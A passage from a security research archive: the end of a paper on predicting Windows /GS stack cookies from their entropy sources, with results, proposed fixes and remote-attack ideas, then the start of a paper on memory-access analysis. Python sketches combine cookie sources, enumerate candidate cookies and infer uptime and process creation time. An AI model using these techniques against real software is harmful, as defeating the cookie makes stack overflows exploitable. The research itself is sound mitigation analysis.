identifier, the thread identifier, and the tick count. The sources that are
|
||||
largely unpredictable are the low 32-bits of the system time and the
|
||||
performance counter. However, if it were possible to come up with a way to
|
||||
discover the boot time (or uptime) of the system remotely, it might be
|
||||
possible to infer a good portion of the low 32-bits of the system time. This
|
||||
would then directly impact the ability to estimate things like the tick count
|
||||
and performance counters.
|
||||
|
||||
5) Experimental Results
|
||||
|
||||
This chapter describes some of the initial results that were collected using a
|
||||
utility developed by the author named gencookie.exe. This utility attempts to
|
||||
calculate the value of the cookie that was generated for the executable image
|
||||
associated with an arbitrary process, such as lsass.exe. While the results of
|
||||
this utility were limited to attempting to calculate the cookie of a process'
|
||||
executable, the techniques described in previous chapters are nonetheless
|
||||
applicable to the cookies generated in the context of dependent DLLs. The
|
||||
results described in this chapter illustrate the tool's ability to accurately
|
||||
obtain specific bits within the different components that compose the cookie,
|
||||
including specific bits of the cookie itself. This helps to paint a picture
|
||||
of the amount of true entropy that is reduced through the techniques described
|
||||
in this document.
|
||||
|
||||
The data set that was used to calculate the overall results included 5001
|
||||
samples which were collected from a single machine. The samples were
|
||||
collected through a few simple steps. First, a program called vulnapp.exe
|
||||
that was compiled with /GS was modified to have its __security_init_cookie routine
|
||||
save information about the cookie that was generated and the values that
|
||||
contributed to its generation. Following that, the gencookie.exe utility was
|
||||
launched against the running process in an attempt to calculate vulnapp.exe's
|
||||
GS cookie. A comparison between the expected and actual value of each
|
||||
component was then saved. These steps were repeated 5001 times. The author
|
||||
would be interested in hearing about independent validation of the findings
|
||||
presented in this chapter.
|
||||
|
||||
The following sections describe the bit-level predictability of each of the
|
||||
components that are used to generate the GS cookie, including the overall
|
||||
predictability of the bits of the GS cookie itself.
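
Bit-level predictability of this kind can be measured by comparing each
estimated value against the value that was actually used. The following is
a minimal sketch under that assumption; the name bit_accuracy is
hypothetical and is not taken from the gencookie.exe utility.

```python
def bit_accuracy(pairs, width=32):
    """Fraction of (estimated, actual) pairs that agree per bit, bit 0 first."""
    pairs = list(pairs)
    if not pairs:
        raise ValueError("at least one pair is required")
    correct = [0] * width
    for estimated, actual in pairs:
        diff = estimated ^ actual  # a set bit marks a wrong guess
        for bit in range(width):
            if not (diff >> bit) & 1:
                correct[bit] += 1
    return [count / len(pairs) for count in correct]
```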
|
||||
|
||||
5.1) System Time
|
||||
|
||||
The system time component was highly predictable. The high 32 bits of the
|
||||
system time were predicted with 100 percent accuracy. The low 32 bits on
|
||||
the other hand were predicted with only 77 percent accuracy (3878 times). The
|
||||
reason for this discrepancy has to do with the thread scheduling scenario
|
||||
described in subsection 4.1.1. Even still, these results indicate that it is
|
||||
likely that the entire system time value can be accurately calculated.
|
||||
|
||||
5.2) Process and Thread Identifier
|
||||
|
||||
The process and thread identifier were successfully calculated 100 percent of
|
||||
the time using the approach outlined in section 4.1.2.
|
||||
|
||||
5.3) Tick Count
|
||||
|
||||
The tick count was accurately calculated 67 percent of the time (3396 times).
|
||||
The reason for this lower rate of success is due in large part to the fact
|
||||
that the tick count is calculated in relation to the estimated system time
|
||||
value. As such, if an incorrect system time value is determined, the tick
|
||||
count itself will be directly influenced. This should account for at least 23
|
||||
percent of the inaccuracies judging from how often the system time was
|
||||
inaccurately estimated. The remaining 10 percent of the inaccuracies is as of
|
||||
yet undetermined, but it is most likely related to an improper
|
||||
interpretation of the constant scaling factor that is applied to the tick
|
||||
count. In any case, it is expected that only a few bits are actually affected
|
||||
in the remaining 10 percent of cases.
|
||||
|
||||
5.4) Performance Counter
|
||||
|
||||
The high 32-bits of the performance counter were successfully estimated 100
|
||||
percent of the time. The low 32-bits, on the other hand, show the greatest
|
||||
degree of volatility when compared to the other components. The high order 15
|
||||
bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50
|
||||
split. The remaining 17 bits were all guessed correctly roughly 50 percent of
|
||||
the time. This makes the low 17 bits the only truly effective source of
|
||||
entropy in the performance counter since there is no bias shown in relation to
|
||||
the estimated versus actual values. Indeed, this is not enough to prove that
|
||||
there aren't observable patterns in the low 17 bits, but it is enough to show
|
||||
that the gencookie.exe utility was not effective in estimating them. The
accompanying figures show the percent accuracy for the high and low order
32 bits.
|
||||
|
||||
This discrepancy actually requires a more detailed explanation. In reality,
|
||||
the estimates made by the gencookie.exe utility are actually not as far off as
|
||||
one might think based on the percent accuracy of each bit as described in the
|
||||
diagrams. Instead, the estimates are, on average, off by only 105,000. This
|
||||
average difference is what leads to the lower 17 bits being so volatile. One
|
||||
thing that's interesting about the difference between the estimated and actual
|
||||
performance counter is that there appears to be a time oriented trend related
|
||||
to how far off the estimates are. Due to the way that the samples were taken,
|
||||
it's safe to assume that each sample is roughly equivalent to one second worth
|
||||
of time passing (due to a sleep between sample collection). Further study of
|
||||
this apparent relationship may yield better results in terms of estimating the
|
||||
lower 17 bits of the low 32 bits of the performance counter. This is left for
|
||||
future research.
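
The relationship between an average error of 105,000 and the volatility of
the lower 17 bits can be checked with a little arithmetic. The sketch below
uses hypothetical helper names and takes the 3579545 performance frequency
mentioned elsewhere in this document as an assumption. An error of this
magnitude needs 17 bits to represent, and at that frequency it corresponds
to a little over 29 milliseconds of wall clock time.

```python
PERF_FREQ = 3_579_545  # counts per second; assumed typical value


def bits_disturbed(average_error):
    """Number of low order bits needed to represent the error magnitude."""
    return abs(average_error).bit_length()


def error_in_ms(average_error, perf_freq=PERF_FREQ):
    """Convert an error in performance counter units to milliseconds."""
    return average_error * 1000 / perf_freq
```

This is only a lower bound on the affected bits, since adding an error can
carry into higher bit positions.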
|
||||
|
||||
5.5) Cookie
|
||||
|
||||
The cookie itself was never actually guessed during the course of sample
|
||||
collection. The reason for this is tightly linked with the current inability
|
||||
to accurately determine the lower 17 bits of the low 32 bits of the
|
||||
performance counter. Comparing the percent accuracy of the cookie bits with
|
||||
the percent accuracy of the low 32 bits of the performance counter yields a
|
||||
very close match.
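
The close match follows from the way the cookie is composed. The sketch
below assumes that the entropy sources are XORed together as 32-bit
quantities, in the manner of __security_init_cookie; the function names and
the choice of 17 unknown bits are illustrative. Under the optimistic
assumption that every other bit was estimated correctly, an attacker would
be left with 2^17 candidate cookies.

```python
MASK32 = 0xFFFFFFFF


def combine_cookie(sys_time, pid, tid, tick_count, perf_counter):
    """XOR the entropy sources together as 32-bit values (assumed scheme)."""
    cookie = (sys_time >> 32) ^ (sys_time & MASK32)
    cookie ^= pid ^ tid ^ tick_count
    cookie ^= (perf_counter >> 32) ^ (perf_counter & MASK32)
    return cookie & MASK32


def candidate_cookies(estimated_cookie, unknown_low_bits=17):
    """Yield every cookie that differs only in the unknown low order bits."""
    base = estimated_cookie & ~((1 << unknown_low_bits) - 1) & MASK32
    for low in range(1 << unknown_low_bits):
        yield base | low
```

Because XOR operates on each bit independently, uncertainty in the low bits
of the performance counter maps directly onto the same bits of the cookie.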
|
||||
|
||||
6) Improvements
|
||||
|
||||
Based on the results described in chapter 5, the author feels that there is
|
||||
plenty of room for improvement in the way that GS cookies are currently
|
||||
generated. It's clear that there is a need to ensure that there are 32 bits
|
||||
of true entropy in the cookie. The following sections outline some potential
|
||||
solutions to the entropy issue described in this document.
|
||||
|
||||
6.1) Better Entropy Sources
|
||||
|
||||
Perhaps the most obvious solution would be to simply improve the set of
|
||||
entropy sources used to generate the cookie. In particular, the use of
|
||||
sources with greater degrees of entropy, especially in the high order bits,
|
||||
would be of great benefit. The challenge, however, is locating sources that
|
||||
are easy to interact with and require very little overhead. For example, it's
|
||||
not really feasible to have the GS cookie generator rely on the crypto API due
|
||||
to the simple fact that this would introduce a dependency on the crypto API in
|
||||
any application that was compiled with /GS. As this document has hopefully
|
||||
shown, it's also a requirement that any additional entropy sources be
|
||||
challenging to estimate externally at a future point in time.
|
||||
|
||||
Even though this is a viable solution, the author is not presently aware of
|
||||
any additional entropy sources that would meet all three requirements. For
|
||||
this reason, the author feels that this approach alone is insufficient to
|
||||
solve the problem. If entropy sources are found which meet these
|
||||
requirements, the author would love to hear about them.
|
||||
|
||||
6.2) Seeding High Order Bits
|
||||
|
||||
A more immediate solution to the problem at hand would involve simply ensuring
|
||||
that the predictable high order bits are seeded with less predictable values.
|
||||
However, additional entropy sources would be required in order to implement
|
||||
this properly. At present, the only major source of entropy found in the GS
|
||||
cookie is the low order bits of the performance counter. It would not be
|
||||
sufficient to simply shift the low order bits of the performance counter into
|
||||
the high order. Doing so would add absolutely no value by itself because it
|
||||
would have no effect on the amount of true entropy in the cookie.
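
The point about shifting can be demonstrated by counting outputs. In the
following sketch, which uses hypothetical function names and an arbitrary
shift of 16, copying the unpredictable low order bits into the high order
bits changes what the cookie looks like but never increases the number of
values that it can take.

```python
def seed_high_bits(low_bits_value, shift=16):
    """Copy the low order bits into the high order bits of a 32-bit value."""
    return (low_bits_value | (low_bits_value << shift)) & 0xFFFFFFFF


def distinct_outputs(unknown_bits, shift=16):
    """Count the distinct results over every possible unknown input."""
    return len({seed_high_bits(v, shift) for v in range(1 << unknown_bits)})
```

With 12 unknown bits there are exactly 2^12 possible outputs, which is the
same search space an attacker faced before the shift was applied.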
|
||||
|
||||
6.3) External Cookie Generation
|
||||
|
||||
An alternative solution that could combine the effects of the first two
|
||||
solutions would be to change the GS implementation to generate the cookie
|
||||
external to the binary itself. One of the most dangerous aspects of the GS
|
||||
implementation is that it is statically linked and therefore would require a
|
||||
recompilation of all affected binaries in the event that a weakness is found.
|
||||
This fact alone should be scary. To help address both this problem and the
|
||||
problem of weak entropy sources, it makes sense to consider a more dynamic
|
||||
approach.
|
||||
|
||||
One example of a dynamic approach would be to have the GS implementation issue
|
||||
a call into a kernel-mode routine that is responsible for generating GS
|
||||
cookies. One place that this support could be added is in
|
||||
NtQuerySystemInformation, though it's likely that a better place may exist.
|
||||
Regardless of the specific routine, this approach would have the benefit of
|
||||
moving the code used to generate the cookie out of the statically linked stub
|
||||
that is inserted by the compiler. If any weakness were to be found in the
|
||||
kernel-mode routine that generates the cookie, Microsoft could issue a patch
|
||||
that would immediately affect all applications compiled to use GS. This would
|
||||
solve some of the concerns relating to the static nature of GS.
|
||||
|
||||
Perhaps even better, this approach would grant greater flexibility to the
|
||||
entropy sources that could be used in the generation of the cookie. Since the
|
||||
routine would exist in kernel-mode, it would have the benefit of being able to
|
||||
access additional sources of entropy that may be challenging or clumsy to
|
||||
interact with from user-mode (though the counterpoint could certainly be made
|
||||
as well). The kernel-mode routine could also accumulate entropy over time and
|
||||
feed that back into the cookie, whereas the statically linked implementation
|
||||
has no context with which to accumulate entropy. The accumulation of state
|
||||
can also do more harm than good. It would be disingenuous to not admit that
|
||||
this approach could also have its own set of problems. A poorly implemented
|
||||
version of this solution might make it possible for a user to eliminate all
|
||||
entropy by issuing a non-trivial number of calls to the kernel-mode routine.
|
||||
There may be additional consequences that have not yet been perceived.
|
||||
|
||||
The impact on performance is also a big point of concern for any potential
|
||||
change to the cookie generation path. At a high-level, a transition into
|
||||
kernel-mode would seem concerning in terms of the amount of overhead that
|
||||
might be added. However, it's important to note that the current
|
||||
implementation of GS already transitions into kernel-mode to obtain some of
|
||||
its information. Specifically, performance counter information is obtained
|
||||
through the system call NtQueryPerformanceCounter. Even more, this system
|
||||
call results in an "in" instruction being issued on an I/O port that is used to query the
|
||||
current performance counter.
|
||||
|
||||
Another important consideration is backward compatibility. If Microsoft were
|
||||
to implement this solution, it would be necessary for applications compiled
|
||||
with the new support to still be able to benefit from GS on older platforms that
|
||||
don't support the new kernel interface. To allow for backward compatibility,
|
||||
Microsoft could implement a combination of all three solutions, whereby better
|
||||
entropy sources and seeding of high order bits are used as a fallback in the
|
||||
event that the kernel-mode interface is not present.
|
||||
|
||||
As it turns out, Microsoft does indeed have a mechanism that could allow them
|
||||
to create a patch that would affect the majority of the binaries compiled with
|
||||
recent versions of GS. This functionality is provided by exposing the address
|
||||
of an image file's security cookie in its load config data directory.
|
||||
When the dynamic loader (ntdll) loads an image file, it checks to see if the
|
||||
security cookie address in the load config data directory is non-NULL. If
|
||||
it's not NULL, the loader proceeds to store the process-wide GS cookie in the
|
||||
module-specific GS cookie location. In this way, the __security_init_cookie
|
||||
routine that's called by the image file's entry point effectively becomes a
|
||||
no-operation because the cookie will have already been initialized. This
|
||||
manner of setting the GS cookie for image files provides Microsoft with much
|
||||
more flexibility. Rather than having to update all binaries compiled with GS,
|
||||
Microsoft can simply update a single binary (ntdll.dll) if improvements need
|
||||
to be made to the cookie generation algorithm. The following output shows a
|
||||
sample of dumpbin /loadconfig on kernel32.dll:
|
||||
|
||||
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
|
||||
Dump of file c:\windows\system32\kernel32.dll
|
||||
|
||||
File Type: DLL
|
||||
|
||||
Section contains the following load config:
|
||||
|
||||
00000048 size
|
||||
0 time date stamp
|
||||
...
|
||||
7C8836CC Security Cookie
|
||||
|
||||
7) Future Work
|
||||
|
||||
There is still additional work that can be done to further refine the
|
||||
techniques described in this document. This chapter outlines some of the
|
||||
major items that could be followed up on.
|
||||
|
||||
7.1) Improving Performance Counter Estimates
|
||||
|
||||
One area in particular that the author feels could benefit from further
|
||||
research has to do with refining the technique used to calculate the
|
||||
performance counter. A more thorough analysis of the apparent association
|
||||
between time and the lower 17 bits of the performance counter is necessary.
|
||||
This analysis would directly affect the ability to recover more cookie state
|
||||
information, since the entropy of the lower 17 bits of the performance counter
|
||||
is one of the only things standing in the way of obtaining the entire cookie.
|
||||
|
||||
7.2) Remote Attacks
|
||||
|
||||
The ability to apply the techniques described in this document in a remote
|
||||
scenario would obviously increase the severity of the problem. In order to do
|
||||
this, an attacker would need the ability to either infer or be able to
|
||||
calculate some of the key elements that are used in the generation of a
|
||||
cookie. This would rely on being able to determine things like the process
|
||||
creation time, the process and thread identifier, and the system uptime. With
|
||||
these values, it should be possible to predict the state of the cookie with
|
||||
similar degrees of accuracy. Of course, methods of obtaining this information
|
||||
remotely are not obvious.
|
||||
|
||||
One point of consideration that should be made is that even if it's not
|
||||
possible to directly determine some of this information, it may be possible to
|
||||
infer it. For instance, consider a scenario where a vulnerability in a
|
||||
service is exposed remotely. There's nothing to stop an attacker from causing
|
||||
the service to crash. In most cases, the service will restart at some
|
||||
predefined point (such as 30 seconds after the crash). Using this approach,
|
||||
an attacker could infer the creation time of the process based on the time
|
||||
that the crash was generated. This isn't foolproof, but it should be
|
||||
possible to get fairly close.
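
As a rough sketch of this inference, the estimated creation time can be
expressed in the same 100 nanosecond units used by the other calculations.
The function names are hypothetical, the 30 second delay is just the example
from the text, and the crash time is assumed to be a whole number of seconds
on the attacker's own clock expressed as Unix time.

```python
EPOCH_DELTA_SECONDS = 11_644_473_600  # 1601-01-01 to 1970-01-01
INTERVALS_PER_SECOND = 10_000_000     # 100 ns intervals in one second


def unix_to_filetime(unix_seconds):
    """Convert whole Unix seconds to 100 ns intervals since 1601-01-01."""
    return (unix_seconds + EPOCH_DELTA_SECONDS) * INTERVALS_PER_SECOND


def est_creation_filetime(crash_unix_seconds, restart_delay_seconds=30):
    """Guess the creation time of a service restarted after a crash."""
    return unix_to_filetime(crash_unix_seconds + restart_delay_seconds)
```

Any difference between the attacker's clock and the target's clock, along
with network latency, would add directly to the error of this estimate.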
|
||||
|
||||
Determining process and thread identifier could be tricky, especially if the
|
||||
system has been up for some time. The author is not aware of a general
|
||||
purpose technique that could be used to determine this information remotely.
|
||||
Fortunately, the process and thread identifier have very little effect on high
|
||||
order bits.
|
||||
|
||||
The system uptime is an interesting one. In the past, there have been
|
||||
techniques that could be used to estimate the uptime of the system through the
|
||||
use of TCP timestamps and other network protocol anomalies. At the time of
|
||||
this writing, the author is not aware of how prevalent or useful these
|
||||
techniques are against modern operating systems. Should they still be
|
||||
effective, they would represent a particularly useful way of obtaining a
|
||||
system's uptime. If an attacker can obtain both the creation time of the
|
||||
process and the uptime of the system, it's possible to calculate the tick
|
||||
count and performance counter values with varying degrees of accuracy.
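
One way such an uptime estimate might be derived from TCP timestamps is
sketched below. This rests on assumptions that may not hold for a given
target: that the remote timestamp counter started near zero at boot, that it
increments at a constant rate, and that it has not wrapped. The function
name and the observation format are hypothetical.

```python
def estimate_uptime_seconds(first, second):
    """Estimate uptime from two (local_time_seconds, remote_tsval) pairs."""
    (t1, ts1), (t2, ts2) = first, second
    if t2 <= t1 or ts2 <= ts1:
        raise ValueError("observations must be strictly increasing")
    # Infer how many timestamp ticks the remote host counts per second.
    rate_hz = (ts2 - ts1) / (t2 - t1)
    # Assumption: the counter started at zero when the system booted.
    return ts2 / rate_hz
```

For instance, two observations taken ten seconds apart whose timestamps
differ by 1000 imply a 100 Hz counter; a timestamp of 2000 would then
suggest roughly 20 seconds of uptime.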
|
||||
|
||||
The performance counter will still pose a great challenge in the remote
|
||||
scenario. The performance frequency that the estimate relies on shouldn't be
seen as an unknown quantity, however. As far as the author is aware, the
performance frequency on
|
||||
modern processors is generally 3579545, though there may be certain power
|
||||
situations that would cause it to be different.
|
||||
|
||||
It is also important to note that the current attack assumes that the load
|
||||
time for an image that has a GS cookie is equivalent to the initial thread's
|
||||
creation time. For example, if a DLL were loaded much later in process
|
||||
execution, such as through instantiating a COM object in Internet Explorer, it
|
||||
would not be possible to assume that initial thread creation time is equal to
|
||||
the system time that was obtained when the DLL's GS cookie was generated.
|
||||
This brings about an interesting point for the remote scenario, however. If
|
||||
an attacker can control the time at which a DLL is loaded, it may be possible
|
||||
for them to infer the value of system time that is used without even having to
|
||||
directly query it. One example of this would be in the context of Internet
Explorer, where the client's date and time functionality might be abused to
|
||||
obtain this information.
|
||||
|
||||
8) Conclusion
|
||||
|
||||
The ability to reduce the amount of effective entropy in a GS cookie can
|
||||
improve an attacker's chances of guessing the cookie. This paper has
|
||||
described two techniques that may be used to calculate or infer the values of
|
||||
certain bits in a GS cookie. The first approach involves a local attacker's
|
||||
ability to collect information that makes it possible to calculate, with
|
||||
pretty good accuracy, the values of the entropy sources that were used at the
|
||||
time that a cookie was generated. The second approach describes the potential
|
||||
for abusing the limited entropy associated with boot start services.
|
||||
|
||||
While the results shown in this paper do not represent a complete break of GS,
|
||||
they do hint toward a general weakness in the way that GS cookies are
|
||||
generated. This is particularly serious given the fact that GS is a compile
|
||||
time solution. If the techniques described in this document are refined, or
|
||||
new and improved techniques are identified, a complete break of GS would
|
||||
require the recompilation of all affected binaries. The implications of this
|
||||
should be obvious. The ability to reliably predict the value of a GS cookie
|
||||
would effectively nullify any benefits that GS adds. It would mean that all
|
||||
stack-based buffer overflows would immediately become exploitable.
|
||||
|
||||
To help contribute to the improvement of GS, a few different solutions were
|
||||
described that could either partially or wholly address some of the weaknesses
|
||||
that were identified. The most interesting of these solutions involves
|
||||
modifying the GS implementation to make use of an external cookie generator,
|
||||
such as the kernel. Going this route would ensure that any weaknesses found
|
||||
in the cookie generation algorithm could be simply addressed through a patch
|
||||
to the kernel. This is much more reasonable than expecting all existing GS
|
||||
enabled binaries to be recompiled.
|
||||
|
||||
It's unclear whether the techniques presented in this paper will have any
|
||||
appreciable effect on future exploits. Only time will tell.
|
||||
|
||||
References
|
||||
|
||||
[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks.
|
||||
http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007.
|
||||
|
||||
[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks.
|
||||
http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007.
|
||||
|
||||
[3] eEye. Memory Retrieval Vulnerabilities.
|
||||
http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007.
|
||||
|
||||
[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
|
||||
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007.
|
||||
|
||||
[5] Microsoft Corporation. /GS (Buffer Security Check).
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007.
|
||||
|
||||
[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
|
||||
http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007.
|
||||
|
||||
[7] Microsoft Corporation. QueryPerformanceFrequency Function.
|
||||
    http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007.
|
||||
|
||||
[8] Microsoft Corporation. QueryPerformanceCounter Function.
|
||||
    http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007.
|
||||
|
||||
[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
|
||||
http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007.
|
||||
|
||||
[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista.
|
||||
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007.
|
800
uninformed/7.2.txt
Normal file
|
@ -0,0 +1,800 @@
|
|||
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
|
||||
skape
|
||||
mmiller@hick.org
|
||||
4/2007
|
||||
|
||||
Abstract
|
||||
|
||||
This paper describes strategies for dynamically analyzing an application's
|
||||
memory access behavior. These strategies make it possible to detect when a
|
||||
read or write is about to occur at a given location in memory while an
|
||||
application is executing. An application's memory access behavior can provide
|
||||
additional insight into its behavior. For example, it may be able to provide
|
||||
an idea of how data propagates throughout the address space. Three individual
|
||||
strategies which can be used to intercept memory accesses are described in
|
||||
this paper. Each strategy makes use of a unique method of intercepting memory
|
||||
accesses. These methods include the use of Dynamic Binary Instrumentation
|
||||
(DBI), x86 hardware paging features, and x86 segmentation features. A
|
||||
detailed description of the design and implementation of these strategies for
|
||||
32-bit versions of Windows is given. Potential uses for these analysis
|
||||
techniques are described in detail.
|
||||
|
||||
1) Introduction
|
||||
|
||||
If software analysis had a holy grail, it would more than likely be centered
|
||||
around the ability to accurately model the data flow behavior of an
|
||||
application. After all, applications aren't really much more than
|
||||
sophisticated data processors that operate on varying sets of input to produce
|
||||
varying sets of output. Describing how an application behaves when it
|
||||
encounters these varying sets of input makes it possible to predict future
|
||||
behavior. Furthermore, it can provide insight into how the input could be
|
||||
altered to cause the application to behave differently. Given these benefits,
|
||||
it's only natural that a discipline exists that is devoted to the study of
|
||||
data flow analysis.
|
||||
|
||||
There are two general approaches that can be taken to perform data flow
|
||||
analysis. The first approach is referred to as static analysis and it
|
||||
involves analyzing an application's source code or compiled binaries without
|
||||
actually executing the application. The second approach is dynamic analysis
|
||||
which, as one would expect, involves analyzing the data flow of an application
|
||||
as it executes. The two approaches both have common and unique benefits and
|
||||
no argument will be made in this paper as to which may be better or worse.
|
||||
Instead, this paper will focus on describing three strategies that may be used
|
||||
to assist in the process of dynamic data flow analysis.
|
||||
|
||||
The first strategy involves using Dynamic Binary Instrumentation (DBI) to
|
||||
rewrite the instruction stream of the executing application in a manner that
|
||||
makes it possible to intercept instructions that read from or write to memory.
|
||||
Two well-known examples of DBI implementations that the author is familiar
|
||||
with are DynamoRIO and Valgrind[3, 11]. The second strategy that will be
|
||||
discussed involves using the hardware paging features of the x86 and x64
|
||||
architectures to trap and handle access to specific pages in memory. Finally,
|
||||
the third strategy makes use of the segmentation features included in the x86
|
||||
architecture to trap memory accesses by making use of the null selector.
|
||||
Though these three strategies vary greatly, they all accomplish the same goal
|
||||
of being able to intercept memory accesses within an application as it
|
||||
executes.
|
||||
|
||||
The ability to intercept memory reads and writes during runtime can support
|
||||
research in additional areas relating to dynamic data flow analysis. For
|
||||
example, the ability to track what areas of code are reading from and writing
|
||||
to memory could make it possible to build a model for the data propagation
|
||||
behaviors of an application. Furthermore, it might be possible to show with
|
||||
what degree of code-level isolation different areas of memory are accessed.
|
||||
Indeed, it may also be possible to attempt to validate the data consistency
|
||||
model of a threaded application by investigating the access behaviors of
|
||||
various regions of memory which are referenced by multiple threads. These are
|
||||
but a few of the many potential candidates for dynamic data flow analysis.
|
||||
|
||||
This paper is organized into three sections. Section 2 gives an introduction
|
||||
to three different strategies for facilitating dynamic data flow analysis.
|
||||
Section 3 enumerates some of the potential scenarios in which these strategies
|
||||
could be applied in order to render some useful information about the data
|
||||
flow behavior of an application. Finally, section 4 describes some of the
|
||||
previous work whose concepts have been used as the basis for the research
|
||||
described herein.
|
||||
|
||||
2) Strategies
|
||||
|
||||
This section describes three strategies that can be used to intercept runtime
|
||||
memory accesses. The strategies described herein do not rely on any static
|
||||
binary analysis. Techniques that do make use of static binary analysis are
|
||||
outside of the scope of this paper.
|
||||
|
||||
2.1) Dynamic Binary Instrumentation
|
||||
|
||||
Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of
|
||||
a binary application at runtime through the injection of instrumentation code.
|
||||
This instrumentation code executes as part of the normal instruction stream
|
||||
after being injected. In most cases, the instrumentation code will be
|
||||
entirely transparent to the application that it's been injected into. Analyzing
|
||||
an application at runtime makes it possible to gain insight into the behavior
|
||||
and state of an application at various points in execution. This highlights
|
||||
one of the key differences between static binary analysis and dynamic binary
|
||||
analysis. Rather than considering what may occur, dynamic binary analysis has
|
||||
the benefit of operating on what actually does occur. This is by no means
|
||||
exhaustive in terms of exercising all code paths in the application, but it
|
||||
makes up for this by providing detailed insight into an application's concrete
|
||||
execution state.
|
||||
|
||||
The benefits of DBI have made it possible to develop some incredibly advanced
|
||||
tools. Examples where DBI might be used include runtime profiling,
|
||||
visualization, and optimization tools. DBI implementations generally fall
|
||||
into two categories: light-weight or heavy-weight. A light-weight DBI
|
||||
operates on the architecture-specific instruction stream and state when
|
||||
performing analysis. A heavy-weight DBI operates on an abstract form of the
|
||||
instruction stream and state. An example of a heavy-weight DBI is Valgrind, which
|
||||
performs analysis on an intermediate representation of the machine state[11,
|
||||
7]. An example of a light-weight DBI is DynamoRIO which performs analysis
|
||||
using the architecture-specific state[3]. The benefit of a heavy-weight DBI
|
||||
over a light-weight DBI is that analysis code written against the intermediate
|
||||
representation is immediately portable to other architectures, whereas
|
||||
light-weight DBI analysis implementations must be fine-tuned to work with
|
||||
individual architectures. While Valgrind is a novel and interesting
|
||||
implementation, it is currently not supported on Windows. For this reason,
|
||||
attention will be given to DynamoRIO for the remainder of this paper. There are
|
||||
many additional DBI frameworks and details, but for the sake of limiting scope
|
||||
these will not be discussed. The reader should consult reference material to
|
||||
learn more about this subject[11].
|
||||
|
||||
DynamoRIO is an example of a DBI framework that allows custom instrumentation
|
||||
code to be integrated in the form of dynamic libraries. The tool itself is a
|
||||
combination of Dynamo, a dynamic optimization engine developed by researchers
|
||||
at HP, and RIO, a runtime introspection and optimization engine developed by
|
||||
MIT. The fine-grained details of the implementation of DynamoRIO are outside
|
||||
of the scope of this paper, but it's important to understand the basic
|
||||
concepts[2].
|
||||
|
||||
At a high-level, figure 1 from Transparent Binary Optimization provides a
|
||||
great visualization of the process employed by Dynamo[2]. In concrete terms,
|
||||
Dynamo works by processing an instruction stream as it executes. To
|
||||
accomplish this, Dynamo assumes responsibility for the execution of the
|
||||
instruction stream. It uses a disassembler to identify the point of the next
|
||||
branch instruction in the code that is about to be executed. The set of
|
||||
instructions disassembled is referred to as a fragment (although it's more
|
||||
commonly known as a basic block). If the target of the branch instruction is
|
||||
in Dynamo's fragment cache, it executes the (potentially optimized) code in
|
||||
the fragment cache. When this code completes, it returns control to Dynamo to
|
||||
disassemble the next fragment. If at some point Dynamo encounters a branch
|
||||
target that is not in its fragment cache, it will add it to the fragment cache
|
||||
and potentially optimize it. This is the perfect opportunity for
|
||||
instrumentation code to be injected into the optimized fragment that is
|
||||
generated for a branch target. Injecting instrumentation code at this level
|
||||
is entirely transparent to the application. While this is an
|
||||
oversimplification of the process used by DynamoRIO, it should at least give
|
||||
some insight into how it functions.
|
||||
|
||||
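As a rough illustration of the dispatch loop described above, the following C
sketch models a fragment cache keyed by branch target. It is not code from
Dynamo or DynamoRIO; the names fragment_cache, cache_contains, dispatch, and
MAX_FRAGMENTS are hypothetical, and the "build" step only records the target
rather than disassembling or optimizing anything.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_FRAGMENTS 64   /* arbitrary capacity chosen for this sketch */

/* Toy fragment cache: remembers which branch targets have been built. */
typedef struct {
    uint32_t targets[MAX_FRAGMENTS];
    size_t   count;
    size_t   builds;   /* times a fragment had to be built          */
    size_t   hits;     /* times an already cached fragment was used */
} fragment_cache;

/* Returns 1 if a fragment for this branch target is already cached. */
static int cache_contains(const fragment_cache *fc, uint32_t target)
{
    for (size_t i = 0; i < fc->count; i++)
        if (fc->targets[i] == target)
            return 1;
    return 0;
}

/*
 * Called whenever control reaches a branch target. A cached fragment is
 * reused; otherwise a new one is "built" and added to the cache. The build
 * step is where instrumentation code would be injected. Returns 1 on a
 * cache hit, 0 if a fragment was built, and -1 if the cache is full.
 */
static int dispatch(fragment_cache *fc, uint32_t target)
{
    if (cache_contains(fc, target)) {
        fc->hits++;
        return 1;
    }
    if (fc->count == MAX_FRAGMENTS)
        return -1;
    fc->targets[fc->count++] = target;
    fc->builds++;
    return 0;
}
```

The point of the sketch is that the build path runs once per branch target,
so any instrumentation inserted there is paid for once and reused on every
later hit.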
One of the best features of DynamoRIO from an analysis standpoint is that it
|
||||
provides a framework for inserting instrumentation code during the time that a
|
||||
fragment is being inserted into the fragment cache. This is especially useful
|
||||
for the purposes of intercepting memory accesses within an application. When
|
||||
a fragment is being created, DynamoRIO provides analysis libraries with the
|
||||
instructions that are to be included in the fragment that is generated. To
|
||||
optimize for performance, DynamoRIO provides multiple levels of disassembly
|
||||
information. At the most optimized level, only very basic information
|
||||
about the instructions is provided. At the least optimized level, very
|
||||
detailed information about the instructions and their operands can be
|
||||
